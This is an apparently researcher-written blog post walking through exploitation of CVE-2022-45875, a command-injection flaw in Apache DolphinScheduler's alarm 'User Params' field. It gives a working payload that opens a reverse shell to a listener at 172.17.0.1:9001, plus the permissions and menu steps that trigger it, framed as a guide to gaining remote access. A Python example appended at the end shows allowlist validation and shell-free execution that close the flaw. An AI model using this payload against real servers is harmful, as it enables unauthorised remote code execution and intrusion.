Apr 27, 2023
An improper input validation flaw that leads to command injection/RCE in #Apache #DolphinScheduler has been found and registered as #CVE-2022-45875
We have already published the analysis blog for this CVE, breaking down what goes on behind the scenes; you can check it here:
Suppose you have already found an alarm you can edit, or create a new one.
Add the following payload to the "User Params" field:
'; echo "sh -i >& /dev/tcp/172.17.0.1/9001 0>&1"|bash;#
Run your listener
There are two ways to launch the exploit now:
Go to "Projects > Click on the project name > Workflow Definition > Start"
This is already mentioned in the analysis blog.
Go to "Projects > Click on the project name > Workflow Instance > Rerun"
Usually, when you access Apache DolphinScheduler you will find tenants, alarms, projects, and workflows already set up.
You need to make sure that you have permission to edit the alarm so you can add your payload, and at least permission to run a workflow so you can decide which alarm group is used for notification. If you can run a workflow and choose the alarm group that includes the malicious alarm, you will be able to exploit it.
You also need a script that already exists on the server, so that when the alarm gets triggered it triggers the payload as well: there are multiple checks, and one of them verifies whether the script file exists or not. For more information about this check, see the analysis blog.
In a previous analysis blog, I explained how Apache DolphinScheduler CVE-2022-45875 happens. In this one, I explain how to get remote access through RCE by exploiting Apache DolphinScheduler CVE-2022-45875 😈
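As an added, defender-side example (not DolphinScheduler's own code), this is the kind of handling that closes the flaw the post describes: the "User Params" value is split into tokens checked against an allowlist, passed to the alert script as an argument vector so no shell parses it, and the script-existence check the post mentions is kept and combined with confinement to one directory. The allowlist, the allowed directory and all function names are assumptions for the example.

```python
import re
import subprocess
from pathlib import Path

# Assumed policy for this example: alert-script "User Params" are plain
# key=value tokens. The allowlist excludes every shell metacharacter, so the
# quote, ';', '|' and '#' that a command-injection payload relies on never
# reach a command line.
PARAM_TOKEN = re.compile(r"[A-Za-z0-9_.@:/=+-]+")


def validate_user_params(raw: str) -> list[str]:
    """Split User Params on whitespace and reject any token off the allowlist."""
    tokens = raw.split()
    for tok in tokens:
        if not PARAM_TOKEN.fullmatch(tok):
            raise ValueError(f"rejected user param token: {tok!r}")
    return tokens


def safe_argv(script_path: str, user_params: str) -> list[str]:
    """Argument vector for the alert script; params are argv entries, not shell text."""
    return ["sh", script_path, *validate_user_params(user_params)]


def run_alert_script(script_path: str, user_params: str,
                     allowed_dir: str = "/opt/alert-scripts") -> int:
    """Resolve the script, confine it to allowed_dir, then run it without a shell."""
    base = Path(allowed_dir).resolve()
    script = (base / script_path).resolve()
    if base not in script.parents:
        raise ValueError(f"script path escapes {allowed_dir}: {script_path!r}")
    if not script.is_file():  # the existence check the post refers to
        raise FileNotFoundError(str(script))
    # shell=False is the default: argv goes straight to execve, never to sh -c
    return subprocess.run(safe_argv(str(script), user_params), check=False).returncode
```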